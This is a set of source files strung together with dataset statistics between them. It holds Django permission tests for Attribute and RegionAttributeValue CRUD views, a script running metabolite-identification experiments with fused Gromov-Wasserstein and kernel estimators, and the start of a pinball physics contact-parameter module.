name='Test Attribute',
unit='Test Unit',
description='This ist a test element'
)
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('attribute-detail', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 200)
def test_get_http_200_ok_for_logged_in_users(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('attribute-detail', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 200)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class AttributeModalDetailViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='owner')
User.objects.create(username='outsider')
def setUp(self):
self.owner = User.objects.get(username='owner')
self.outsider = User.objects.get(username='outsider')
self.attribute = Attribute.objects.create(
owner=self.owner,
name='Test Attribute',
unit='Test Unit',
description='This ist a test element'
)
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('attribute-detail-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 200)
def test_get_http_200_ok_for_logged_in_users(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('attribute-detail-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 200)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class AttributeUpdateViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='owner')
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='change_attribute'))
member.groups.add(members)
def setUp(self):
self.owner = User.objects.get(username='owner')
self.outsider = User.objects.get(username='outsider')
self.member = User.objects.get(username='member')
self.attribute = Attribute.objects.create(
owner=self.owner,
name='Test Attribute',
unit='Test Unit',
description='This ist a test element'
)
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('attribute-update', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('attribute-update', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('attribute-update', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('attribute-update', kwargs={'pk': self.attribute.pk}), data={})
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
data = {'name': 'Updated Attribute', 'unit': self.attribute.unit}
response = self.client.post(reverse('attribute-update', kwargs={'pk': self.attribute.pk}), data=data)
self.assertEqual(response.status_code, 403)
def test_post_http_302_redirect_for_members(self):
self.client.force_login(self.member)
data = {'name': 'Updated Attribute', 'unit': self.attribute.unit}
response = self.client.post(reverse('attribute-update', kwargs={'pk': self.attribute.pk}), data=data)
self.assertEqual(response.status_code, 302)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class AttributeModalUpdateViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='owner')
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='change_attribute'))
member.groups.add(members)
def setUp(self):
self.owner = User.objects.get(username='owner')
self.outsider = User.objects.get(username='outsider')
self.member = User.objects.get(username='member')
self.attribute = Attribute.objects.create(
owner=self.owner,
name='Test Attribute',
unit='Test Unit',
description='This ist a test element'
)
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('attribute-update-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('attribute-update-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('attribute-update-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('attribute-update-modal', kwargs={'pk': self.attribute.pk}), data={})
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
data = {'name': 'Updated Attribute', 'unit': self.attribute.unit}
response = self.client.post(reverse('attribute-update-modal', kwargs={'pk': self.attribute.pk}), data=data)
self.assertEqual(response.status_code, 403)
def test_post_http_302_redirect_for_members(self):
self.client.force_login(self.member)
data = {'name': 'Updated Attribute', 'unit': self.attribute.unit}
response = self.client.post(reverse('attribute-update-modal', kwargs={'pk': self.attribute.pk}), data=data)
self.assertEqual(response.status_code, 302)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class AttributeModalDeleteViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='owner')
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='delete_attribute'))
member.groups.add(members)
def setUp(self):
self.owner = User.objects.get(username='owner')
self.outsider = User.objects.get(username='outsider')
self.member = User.objects.get(username='member')
self.attribute = Attribute.objects.create(
owner=self.owner,
name='Test Attribute',
unit='Test Unit',
description='This ist a test element'
)
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('attribute-delete-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('attribute-delete-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('attribute-delete-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('attribute-delete-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.post(reverse('attribute-delete-modal', kwargs={'pk': self.attribute.pk}))
self.assertEqual(response.status_code, 403)
def test_post_successful_delete_and_http_302_and_for_members(self):
self.client.force_login(self.member)
response = self.client.post(reverse('attribute-delete-modal', kwargs={'pk': self.attribute.pk}))
with self.assertRaises(Attribute.DoesNotExist):
Attribute.objects.get(pk=self.attribute.pk)
self.assertEqual(response.status_code, 302)
# ----------- Region Attribute Value CRUD ------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class RegionAttributeValueListViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='outsider')
def setUp(self):
self.outsider = User.objects.get(username='outsider')
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('regionattributevalue-list'))
self.assertEqual(response.status_code, 200)
def test_get_http_200_ok_for_logged_in_users(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('regionattributevalue-list'))
self.assertEqual(response.status_code, 200)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class RegionAttributeValueCreateViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='add_regionattributevalue'))
member.groups.add(members)
Region.objects.create(owner=owner, name='Test Region')
Attribute.objects.create(owner=owner, name='Test Attribute', unit='Test Unit')
def setUp(self):
self.member = User.objects.get(username='member')
self.outsider = User.objects.get(username='outsider')
self.region = Region.objects.get(name='Test Region')
self.attribute = Attribute.objects.get(name='Test Attribute')
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('regionattributevalue-create'))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('regionattributevalue-create'))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('regionattributevalue-create'))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('regionattributevalue-create'), data={})
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.post(reverse('regionattributevalue-create'), data={})
self.assertEqual(response.status_code, 403)
def test_post_http_302_redirect_for_members_with_minimal_data(self):
self.client.force_login(self.member)
data = {
'name': 'Test Attribute Value',
'region': self.region.id,
'attribute': self.attribute.id,
'value': 123.321
}
response = self.client.post(reverse('regionattributevalue-create'), data=data)
self.assertEqual(response.status_code, 302)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class RegionAttributeValueModalCreateViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='add_regionattributevalue'))
member.groups.add(members)
Region.objects.create(owner=owner, name='Test Region')
Attribute.objects.create(owner=owner, name='Test Attribute', unit='Test Unit')
def setUp(self):
self.owner = get_default_owner()
self.member = User.objects.get(username='member')
self.outsider = User.objects.get(username='outsider')
self.region = Region.objects.get(name='Test Region')
self.attribute = Attribute.objects.get(name='Test Attribute')
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('regionattributevalue-create-modal'))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('regionattributevalue-create-modal'))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('regionattributevalue-create-modal'))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('regionattributevalue-create-modal'), data={})
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.post(reverse('regionattributevalue-create-modal'), data={})
self.assertEqual(response.status_code, 403)
def test_post_http_302_redirect_for_members_with_minimal_data(self):
self.client.force_login(self.member)
data = {
'name': 'Test Attribute Value',
'region': self.region.id,
'attribute': self.attribute.id,
'value': 123.321
}
response = self.client.post(reverse('regionattributevalue-create-modal'), data=data)
self.assertEqual(response.status_code, 302)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class RegionAttributeValueDetailViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
User.objects.create(username='outsider')
Region.objects.create(owner=owner, name='Test Region')
Attribute.objects.create(owner=owner, name='Test Attribute', unit='Test Unit')
def setUp(self):
self.owner = get_default_owner()
self.outsider = User.objects.get(username='outsider')
self.region = Region.objects.get(name='Test Region')
self.attribute = Attribute.objects.get(name='Test Attribute')
self.value = RegionAttributeValue.objects.create(
owner=self.owner,
name='Test Value',
region=self.region,
attribute=self.attribute,
value=123.312
)
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('regionattributevalue-detail', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 200)
def test_get_http_200_ok_for_logged_in_users(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('regionattributevalue-detail', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 200)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class RegionAttributeValueModalDetailViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
User.objects.create(username='owner')
User.objects.create(username='outsider')
Region.objects.create(owner=owner, name='Test Region')
Attribute.objects.create(owner=owner, name='Test Attribute', unit='Test Unit')
def setUp(self):
self.owner = get_default_owner()
self.outsider = User.objects.get(username='outsider')
self.region = Region.objects.get(name='Test Region')
self.attribute = Attribute.objects.get(name='Test Attribute')
self.value = RegionAttributeValue.objects.create(
owner=self.owner,
name='Test Value',
region=self.region,
attribute=self.attribute,
value=123.312
)
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('regionattributevalue-detail-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 200)
def test_get_http_200_ok_for_logged_in_users(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('regionattributevalue-detail-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 200)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class RegionAttributeValueUpdateViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
User.objects.create(username='owner')
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='change_regionattributevalue'))
member.groups.add(members)
Region.objects.create(owner=owner, name='Test Region')
Attribute.objects.create(owner=owner, name='Test Attribute', unit='Test Unit')
def setUp(self):
self.owner = get_default_owner()
self.outsider = User.objects.get(username='outsider')
self.member = User.objects.get(username='member')
self.region = Region.objects.get(name='Test Region')
self.attribute = Attribute.objects.get(name='Test Attribute')
self.value = RegionAttributeValue.objects.create(
owner=self.owner,
name='Test Value',
region=self.region,
attribute=self.attribute,
value=123.312
)
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('regionattributevalue-update', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('regionattributevalue-update', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('regionattributevalue-update', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('regionattributevalue-update', kwargs={'pk': self.value.pk}), data={})
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
data = {
'name': 'Updated Value',
'region': self.region.id,
'attribute': self.attribute.id,
'value': 456.654
}
response = self.client.post(reverse('regionattributevalue-update', kwargs={'pk': self.value.pk}), data=data)
self.assertEqual(response.status_code, 403)
def test_post_http_302_redirect_for_members(self):
self.client.force_login(self.member)
data = {
'name': 'Updated Value',
'region': self.region.id,
'attribute': self.attribute.id,
'value': 456.654
}
response = self.client.post(reverse('regionattributevalue-update', kwargs={'pk': self.value.pk}), data=data)
self.assertEqual(response.status_code, 302)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class RegionAttributeValueModalUpdateViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='change_regionattributevalue'))
member.groups.add(members)
Region.objects.create(owner=owner, name='Test Region')
Attribute.objects.create(owner=owner, name='Test Attribute', unit='Test Unit')
def setUp(self):
self.owner = get_default_owner()
self.outsider = User.objects.get(username='outsider')
self.member = User.objects.get(username='member')
self.region = Region.objects.get(name='Test Region')
self.attribute = Attribute.objects.get(name='Test Attribute')
self.value = RegionAttributeValue.objects.create(
owner=self.owner,
name='Test Value',
region=self.region,
attribute=self.attribute,
value=123.312
)
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('regionattributevalue-update-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('regionattributevalue-update-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('regionattributevalue-update-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('regionattributevalue-update-modal', kwargs={'pk': self.value.pk}), data={})
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
data = {
'name': 'Updated Value',
'region': self.region.id,
'attribute': self.attribute.id,
'value': 456.654
}
response = self.client.post(
reverse('regionattributevalue-update-modal', kwargs={'pk': self.value.pk}),
data=data
)
self.assertEqual(response.status_code, 403)
def test_post_http_302_redirect_for_members(self):
self.client.force_login(self.member)
data = {
'name': 'Updated Value',
'region': self.region.id,
'attribute': self.attribute.id,
'value': 456.654
}
response = self.client.post(
reverse('regionattributevalue-update-modal', kwargs={'pk': self.value.pk}),
data=data
)
self.assertEqual(response.status_code, 302)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class RegionAttributeValueModalDeleteViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
User.objects.create(username='owner')
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='delete_regionattributevalue'))
member.groups.add(members)
Region.objects.create(owner=owner, name='Test Region')
Attribute.objects.create(owner=owner, name='Test Attribute', unit='Test Unit')
def setUp(self):
self.owner = get_default_owner()
self.outsider = User.objects.get(username='outsider')
self.member = User.objects.get(username='member')
self.region = Region.objects.get(name='Test Region')
self.attribute = Attribute.objects.get(name='Test Attribute')
self.value = RegionAttributeValue.objects.create(
owner=self.owner,
name='Test Value',
region=self.region,
attribute=self.attribute,
value=123.312
)
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('regionattributevalue-delete-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('regionattributevalue-delete-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('regionattributevalue-delete-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('regionattributevalue-delete-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.post(reverse('regionattributevalue-delete-modal', kwargs={'pk': self.value.pk}))
self.assertEqual(response.status_code, 403)
def test_post_successful_delete_and_http_302_and_for_members(self):
self.client.force_login(self.member)
response = self.client.post(reverse('regionattributevalue-delete-modal', kwargs={'pk': self.value.pk}))
with self.assertRaises(RegionAttributeValue.DoesNotExist):
RegionAttributeValue.objects.get(pk=self.value.pk)
self.assertEqual(response.status_code, 302)
| 42.938559
| 120
| 0.675458
| 4,630
| 40,534
| 5.722246
| 0.042333
| 0.047935
| 0.072922
| 0.086472
| 0.921076
| 0.911905
| 0.90379
| 0.868121
| 0.85876
| 0.848909
| 0
| 0.019361
| 0.195959
| 40,534
| 943
| 121
| 42.984093
| 0.793563
| 0.011719
| 0
| 0.802057
| 0
| 0
| 0.144056
| 0.072627
| 0
| 0
| 0
| 0
| 0.113111
| 1
| 0.152956
| false
| 0.005141
| 0.007712
| 0
| 0.18509
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56ff469f4995f00a9d8b9b37ebd1fa2bf4b367ad
| 7,315
|
py
|
Python
|
train_val.py
|
lmotte/metabolite-identification-with-fused-gromov-wasserstein
|
9545045787d3ec30704db0461893e1c3d840fe26
|
[
"MIT"
] | null | null | null |
train_val.py
|
lmotte/metabolite-identification-with-fused-gromov-wasserstein
|
9545045787d3ec30704db0461893e1c3d840fe26
|
[
"MIT"
] | null | null | null |
train_val.py
|
lmotte/metabolite-identification-with-fused-gromov-wasserstein
|
9545045787d3ec30704db0461893e1c3d840fe26
|
[
"MIT"
] | null | null | null |
try:
from time import time
from Methods.method_gromov_wasserstein import FgwEstimator
from Methods.method_graph_kernel import GraphKernelEstimator
from Methods.method_fingerprint import IOKREstimator
from Utils.metabolites_utils import center_gram_matrix, normalize_gram_matrix
from Utils.load_data import load_dataset_kernel_graph, load_dataset_kernel_finger
from Utils.diffusion import diffuse
except ModuleNotFoundError:
import sys
sys.path.insert(0, '/tsi/clusterhome/lmotte/Implementation/metabolite-identification-with-fused-gromov-wasserstein')
from time import time
from Methods.method_gromov_wasserstein import FgwEstimator
from Methods.method_graph_kernel import GraphKernelEstimator
from Methods.method_fingerprint import IOKREstimator
from Utils.metabolites_utils import center_gram_matrix, normalize_gram_matrix
from Utils.load_data import load_dataset_kernel_graph, load_dataset_kernel_finger
from Utils.diffusion import diffuse
def exp_gw_onehot(n_tr, n_val, L, unused, n_bary, n_c_max):
# Load data
t0 = time()
D_tr, D_te = load_dataset_kernel_graph(n_tr - n_val)
K, Y = D_tr
K_tr_te, K_te_te, Y_te = D_te
n = K_tr_te.shape[0]
K_tr_te, K_te_te = K_tr_te[:, :n_val], K_te_te[:n_val, :n_val]
Y_te = [Y_te[0][: n_val], Y_te[1][: n_val], Y_te[2][: n_val], Y_te[3][: n_val]]
print(f'Load time: {time() - t0}', flush=True)
# Input pre-processing
t0 = time()
center, normalize = True, True
if center:
K_tr_te = center_gram_matrix(K_tr_te, K, K_tr_te, K)
K = center_gram_matrix(K)
if normalize:
K_tr_te = normalize_gram_matrix(K_tr_te, K, K_te_te)
K = normalize_gram_matrix(K)
print(f'Pre-processing time: {time() - t0}', flush=True)
# Train
t0 = time()
clf = FgwEstimator()
clf.ground_metric = 'onehot'
clf.train(K, Y, L)
print(f'Train time: {time() - t0}', flush=True)
# Predict
t0 = time()
fgw, topk, n_pred = clf.predict(K_tr_te, n_bary=n_bary, Y_te=Y_te, n_c_max=n_c_max)
print(f'Test time: {time() - t0}', flush=True)
print(f'{(n_tr, n_val, L, None, n_bary, n_c_max)}, mean fgw : {fgw}, topk = {topk}', flush=True)
return fgw[0], topk, n, n_pred
def exp_gw_fine(n_tr, n_val, L, w, n_bary, n_c_max):
# Load data
t0 = time()
D_tr, D_te = load_dataset_kernel_graph(n_tr - n_val)
K, Y = D_tr
K_tr_te, K_te_te, Y_te = D_te
n = K_tr_te.shape[0]
K_tr_te, K_te_te = K_tr_te[:, :n_val], K_te_te[:n_val, :n_val]
Y_te = [Y_te[0][: n_val], Y_te[1][: n_val], Y_te[2][: n_val], Y_te[3][: n_val]]
print(f'Load time: {time() - t0}', flush=True)
# Input pre-processing
t0 = time()
center, normalize = True, True
if center:
K_tr_te = center_gram_matrix(K_tr_te, K, K_tr_te, K)
K = center_gram_matrix(K)
if normalize:
K_tr_te = normalize_gram_matrix(K_tr_te, K, K_te_te)
K = normalize_gram_matrix(K)
print(f'Pre-processing time: {time() - t0}', flush=True)
# Train
t0 = time()
clf = FgwEstimator()
clf.ground_metric = 'fine'
clf.w = w
clf.train(K, Y, L)
print(f'Train time: {time() - t0}', flush=True)
# Predict
t0 = time()
fgw, topk, n_pred = clf.predict(K_tr_te, n_bary=n_bary, Y_te=Y_te, n_c_max=n_c_max)
print(f'Test time: {time() - t0}', flush=True)
print(f'{(n_tr, n_val, L, w, n_bary, n_c_max)}, mean fgw : {fgw}, topk = {topk}', flush=True)
return fgw[0], topk, n, n_pred
def exp_gw_diffuse(n_tr, n_val, L, tau, n_bary, n_c_max):
# Load data
t0 = time()
D_tr, D_te = load_dataset_kernel_graph(n_tr - n_val)
K, Y = D_tr
K_tr_te, K_te_te, Y_te = D_te
n = K_tr_te.shape[0]
K_tr_te, K_te_te = K_tr_te[:, :n_val], K_te_te[:n_val, :n_val]
Y_te = [Y_te[0][: n_val], Y_te[1][: n_val], Y_te[2][: n_val], Y_te[3][: n_val]]
print(f'Load time: {time() - t0}', flush=True)
# Input pre-processing
t0 = time()
center, normalize = True, True
if center:
K_tr_te = center_gram_matrix(K_tr_te, K, K_tr_te, K)
K = center_gram_matrix(K)
if normalize:
K_tr_te = normalize_gram_matrix(K_tr_te, K, K_te_te)
K = normalize_gram_matrix(K)
print(f'Pre-processing time: {time() - t0}', flush=True)
# Train
t0 = time()
clf = FgwEstimator()
clf.ground_metric = 'diffuse'
clf.tau = tau
Y = diffuse(Y, clf.tau)
clf.train(K, Y, L)
print(f'Train time: {time() - t0}', flush=True)
# Predict
t0 = time()
fgw, topk, n_pred = clf.predict(K_tr_te, n_bary=n_bary, Y_te=Y_te, n_c_max=n_c_max)
print(f'Test time: {time() - t0}', flush=True)
print(f'{(n_tr, n_val, L, tau, n_bary, n_c_max)}, mean fgw : {fgw}, topk = {topk}', flush=True)
return fgw[0], topk, n, n_pred
def exp_gk(n_tr, n_val, L, h, n_bary, n_c_max):
# Load data
t0 = time()
D_tr, D_te = load_dataset_kernel_graph(n_tr - n_val)
K, Y = D_tr
K_tr_te, K_te_te, Y_te = D_te
K_tr_te, K_te_te = K_tr_te[:, :n_val], K_te_te[:n_val, :n_val]
Y_te = [Y_te[0][: n_val], Y_te[1][: n_val], Y_te[2][: n_val], Y_te[3][: n_val]]
n = K_tr_te.shape[0]
print(f'Load time: {time() - t0}', flush=True)
# Input pre-processing
t0 = time()
center, normalize = True, True
if center:
K_tr_te = center_gram_matrix(K_tr_te, K, K_tr_te, K)
K = center_gram_matrix(K)
if normalize:
K_tr_te = normalize_gram_matrix(K_tr_te, K, K_te_te)
K = normalize_gram_matrix(K)
print(f'Pre-processing time: {time() - t0}', flush=True)
# Train
t0 = time()
clf = GraphKernelEstimator()
clf.train(K, Y, L)
print(f'Train time: {time() - t0}', flush=True)
# Predict
t0 = time()
clf.h = h
fgw, topk, n_pred = clf.predict(K_tr_te, n_bary=n_bary, Y_te=Y_te, n_c_max=n_c_max)
print(f'Test time: {time() - t0}', flush=True)
print(f'{(n_tr, n_val, L, h, n_bary, n_c_max)}, mean fgw : {fgw}, topk = {topk}', flush=True)
return fgw[0], topk, n, n_pred
def exp_finger(n_tr, n_val, L, g, unused, n_c_max):
# Load data
t0 = time()
D_tr, D_te = load_dataset_kernel_finger(n_tr-n_val)
K, Y = D_tr
K_tr_te, K_te_te, Y_te = D_te
K_tr_te, K_te_te = K_tr_te[:, :n_val], K_te_te[:n_val, :n_val]
Y_te = [Y_te[0][: n_val], Y_te[1][: n_val], Y_te[2][: n_val], Y_te[3][: n_val]]
n = K_tr_te.shape[0]
print(f'Load time: {time() - t0}', flush=True)
# Input pre-processing
t0 = time()
center, normalize = True, True
if center:
K_tr_te = center_gram_matrix(K_tr_te, K, K_tr_te, K)
K = center_gram_matrix(K)
if normalize:
K_tr_te = normalize_gram_matrix(K_tr_te, K, K_te_te)
K = normalize_gram_matrix(K)
print(f'Pre-processing time: {time() - t0}', flush=True)
# Train
t0 = time()
clf = IOKREstimator()
clf.train(K, Y, L, g)
print(f'Train time: {time() - t0}', flush=True)
# Predict
t0 = time()
n_bary = n_tr
fgw, topk, n_pred = clf.predict(K_tr_te, Y_te=Y_te, n_c_max=n_c_max)
print(f'Test time: {time() - t0}', flush=True)
print(f'{(n_tr, n_val, L, g, n_bary, n_c_max)}, mean fgw : {fgw}, topk = {topk}', flush=True)
return fgw[0], topk, n, n_pred
| 32.802691
| 120
| 0.632946
| 1,334
| 7,315
| 3.145427
| 0.065217
| 0.047664
| 0.059581
| 0.035748
| 0.935415
| 0.928027
| 0.925643
| 0.925643
| 0.925643
| 0.919209
| 0
| 0.012515
| 0.22447
| 7,315
| 222
| 121
| 32.95045
| 0.727129
| 0.030622
| 0
| 0.832298
| 0
| 0.031056
| 0.142291
| 0.013296
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031056
| false
| 0
| 0.093168
| 0
| 0.15528
| 0.167702
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85a718827cb4be70c0cb7b2db2822aacdeb94b94
| 3,463
|
py
|
Python
|
pinballbase/ContactParams.py
|
OpenDisneyGames/PiratesPinball
|
411728429083e2f36a691b8db7966f91a1ea6a1f
|
[
"Apache-2.0"
] | 3
|
2020-07-16T20:18:26.000Z
|
2021-04-22T13:01:46.000Z
|
pinballbase/ContactParams.py
|
OpenDisneyGames/PiratesPinball
|
411728429083e2f36a691b8db7966f91a1ea6a1f
|
[
"Apache-2.0"
] | null | null | null |
pinballbase/ContactParams.py
|
OpenDisneyGames/PiratesPinball
|
411728429083e2f36a691b8db7966f91a1ea6a1f
|
[
"Apache-2.0"
] | null | null | null |
import sgode.pyode
from pinballbase.odeConstructs import *
def getCategoryIndex(category):
for i in range(32):
if category & 1 << i > 0:
return i
return -1
def setupContactParams(worldInfo):
worldInfo.defaultContactParams.surface.mode = sgode.pyode.dContactBounce
worldInfo.defaultContactParams.surface.mu = 10.0
worldInfo.defaultContactParams.surface.bounce = 0.1
